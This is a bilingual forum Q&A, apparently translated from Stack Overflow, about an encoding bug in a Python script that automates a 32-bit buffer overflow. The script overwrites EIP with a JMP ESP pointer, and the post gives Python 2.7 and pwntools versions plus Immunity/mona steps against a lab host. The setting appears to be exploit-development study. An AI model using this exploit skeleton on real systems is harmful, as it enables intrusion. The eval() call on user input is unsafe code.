通过套接字在 raw_input 变量中发送转义的十六进制字符串不起作用?

Sending escaped hex string in raw_input variable over socket doesn't work?

提前见谅。我知道我的代码很草率,有点老套。

我正在尝试编写一个基于菜单的脚本来自动执行 32 位缓冲区溢出的每个步骤(作为一些背景故事)。大多数步骤我都已自动执行,没有问题,但我试图在发送之前将一系列转义的十六进制字符附加到我的缓冲区(请参见下面的代码)。

我已经为 Python 2.7 和 Python 3 编写了脚本(使用 pwnlib 进行 p32 little endian 处理)。从那以后我就放弃了 Python 3,因为它对于漏洞利用编写来说似乎有点乏味。 我 运行 遇到的问题是,存储在通过 raw_input 定义的字符串变量中的转义十六进制字符未通过套接字正确发送。

如果我对转义的十六进制字符进行硬编码,脚本将完美运行我确信我已经阅读了大量内容以了解某种编码存在问题,但我已经这样做了几天,此时我感到非常沮丧。

Python 2.7

#!/usr/bin/env python2
from binascii import *
import socket, os, time, shlex, subprocess, re, struct, sys, binascii
global RHOST, RPORT, RPORT_str, buf, buf_len, choice, s, command, pattern_create, match_offset, match_offset_str, badchars, eip_verification

def send_buf():
    global RHOST, RPORT, RPORT_str, buf, buf_len, choice, s, command, pattern_create, match_offset, match_offset_str, badchars, eip_verification    
    
    while True:
        try:    
            # connect to socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((RHOST,RPORT))

            # send buffer fuzz
            s.send(buf + "\n")
            # print out sent block
            print "Sent: {0}".format(buf)
            break
        except:
            print "Failed to connect to server."
            pause = raw_input("Press any key to continue...")

RHOST = "10.0.0.2"
RPORT = 31337
match_offset = 146
command = ""

print "[6] Finding the Right Module"
print 30 * "-" , "README" , 30 * "-"
print "Within Immunity Debugger, type the following: \n"
print "!mona modules \n"
print "Note the base address and module name for the module with least protections listed."
print "The idea here is to locate the JMP ESP address used by this module, and overwrite the EIP with that address."
print "!mona find -s \"\xff\xe4\" -m <module_name>" 

pointer = raw_input("Enter the pointer address used by the vulnerable module with least protections: ")
print pointer
print "Convert the string above to little endian. (I.E 0x080414c3 -> \xc3\x14\x04\x08) "

le_pointer = raw_input("Little-endian: ")
#le_pointer = le_pointer.decode("unicode_escape")
buf = command + ("A" * match_offset) + le_pointer
print buf
send_buf()

硬编码 le_pointer 工作得很好,但我想了解为什么它在接受来自 raw_input 的输入时不起作用。这两个对象都是字符串,所以我在某处存在根本性的误解。

我确定我必须进一步详细说明,但我将不胜感激任何能解决这个问题的帮助。

是否有更好的解决方案来通过用户输入接受指针地址(即:0x080414c3),将其转换为转义的十六进制,反转字节顺序(对于小端架构),并将其附加到以一种可以通过套接字正确发送的方式发送缓冲区?

硬编码 le_pointer 这样可以正常工作。 le_pointer = "\xc3\x14\x04\x08"

对于任何努力完成与我相同或相似任务的人来说,在 StrByte 对象上也有困难,或者正在尝试将 Python 2.7 漏洞转化为Python 3,我发现最好通过 string.encode() 将所有字符串对象转换为字节,然后只使用它们。

我通过使用 Python 3(由@tripleee 推荐),pwntools 模块 p32,将所有字符串转换为字节,并使用这些而不是字符串来实现我的目标Python2.7.

感谢@tripleee 和@steve 帮助澄清了我的一些误解,并试图帮助我解决这个问题。下面是我修改后的代码,Python 3.

#!/usr/bin/env python3
from pwn import *
# import socket, shlex, subprocess, six, binascii, os, time, sys, pwnlib
global RHOST, RPORT, RPORT_str, buf, buf_len, choice, s, command, pattern_create, match_offset, match_offset_str, badchars, eip_verification

def send_buf():
    global RHOST, RPORT, RPORT_str, buf, buf_len, choice, s, command, pattern_create, match_offset, match_offset_str, badchars, eip_verification    
    
    while True:
        try:    
            # connect to socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((RHOST,RPORT))


            # send buffer fuzz
            s.send(buf)
            # print out sent block
            print("Sent: {0}".format(buf))
            break
        except:
            print("Failed to connect to server.")
            pause = input("Press any key to continue...")

RHOST = "10.0.0.41"
RPORT = 31337
match_offset = 146
command = ''.encode()

print("[6] Finding the Right Module")
print(30 * "-" , "README" , 30 * "-")
print("Within Immunity Debugger, type the following: \n")
print("!mona modules \n")

print("Note the base address and module name for the module with least protections listed.")

print("The idea here is to locate the JMP ESP address used by this module, and overwrite the EIP with that address.")

print("!mona find -s \"\xff\xe4\" -m <module_name>") 

pointer = eval(input("Enter the JMP ESP pointer address used by the vulnerable module with least protections: "))


le_pointer = p32(pointer)
print(le_pointer)

newline = "\n".encode()
pad = ("A" * match_offset).encode()
pre_buf = command + pad
buf = pre_buf + le_pointer + newline

print(buf)
pause = input("Ensure immunity is running, attached, and breakpoint is configured to halt program upon JMP ESP trigger: ")
send_buf()